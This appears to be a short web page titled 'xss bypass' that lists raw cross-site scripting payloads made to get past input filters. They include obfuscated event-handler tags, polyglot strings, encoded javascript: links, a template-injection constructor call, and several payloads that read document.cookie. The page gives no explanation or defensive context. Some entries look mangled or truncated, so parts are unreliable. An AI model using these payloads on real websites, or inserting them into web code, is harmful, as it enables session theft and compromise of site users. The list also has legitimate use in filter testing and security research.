xss bypass

171 阅读1分钟

xss bypass

<input/%00/autofocus=""/%00/onfocus=.1|alertXSS>

<h1/%6f%6e/oNclicK=alerthacked>

"%2Bself%2Ffoo%2F'alert'%2Fbar%2F%2F%2F

"> @keyframes x{}>

<b/style=position:fixed;top:0;left:0;font-size:200px>CSS<

< a href="/">/)}); function+__MobileAppList(){alert(1)}//>

jaVasCript:/-//*\/'/"//(//oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

%22%3E%3Casuka%20AutoFocus%20ContentEditable%20OnFocusIn%3D_%3Dalert%2C_%28document.cookie%29%3E

[email]a@a.a?[email=a@a.a?onmouseover=alert(1) a]a[/email][/email]

&#34;+confirm(1)+"

XSS

XSS

XSS

XSS

onMouseOver= <h1 onmouseover= top8680439..toString(30)> <h1 onmouseover=top/al/.source+/ert/.source> <h1 onmouseover=["XSS"].find(alert)> <h1 onmouseover= (((confirm)))_XSS_>

<input onblur=top/al/.source+/ert/.source autofocus> <input onblur=["XSS!"].find(alert) autofocus> <input onblur=(((confirm)))("XSS!") autofocus>

<p/onclick=%27new%20Functional\ert\\u0059\u0030\u0030\u0030`%27>d <p/onclick=self[aler%2bt]\u0059\u0030\u0030\u0030`>d

_XSS_ _XSS_

<img/src=%27i.imgur.com/kkum7k2.jpg…_")

<Img src="/" =_=" title=" onerror='prompt(document.cookie)'">

Xss by XSS0 XSS0

XSS0

"onfocus="alert('XSS0')"+autofocus="

<!-->

"><svg/onload=alert${'000'}¥000!.was.here$>

<svg/onload=eval("ale"+"rt")(✓${alert})>

XSS0

"><details/open/ontoggle=confirm("/xss_by_XSS/")>

<meta%20http-equiv="refresh"%20content="0;"> " autofocus '-->--!><Input/Autofocus/*/Onfocus=document.location=``;alert_XSS_//>

"jaVasCript:/-//*\/'/"/**/(/* */onMouSeoVer=alert(1) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(100)//>\x3e "

/-//*\/'/"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0]v+a+e+s(/infected/.source)"/>click

{{this.constructor.constructor('alert("foo")')()}}

<ijavascriptmg+src+ojavascriptnerror=confirm(1)>

<svg%0Aonauxclick=0;[1].some(confirm)//

<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert1;>

<%00EEEE<svg ////ONLoad='a\u006c\u0065\u0072\u0074(1)'///>svg>%0APayload

%ff<!---><svg/onload=top[/al/.source+/ert/.source]()>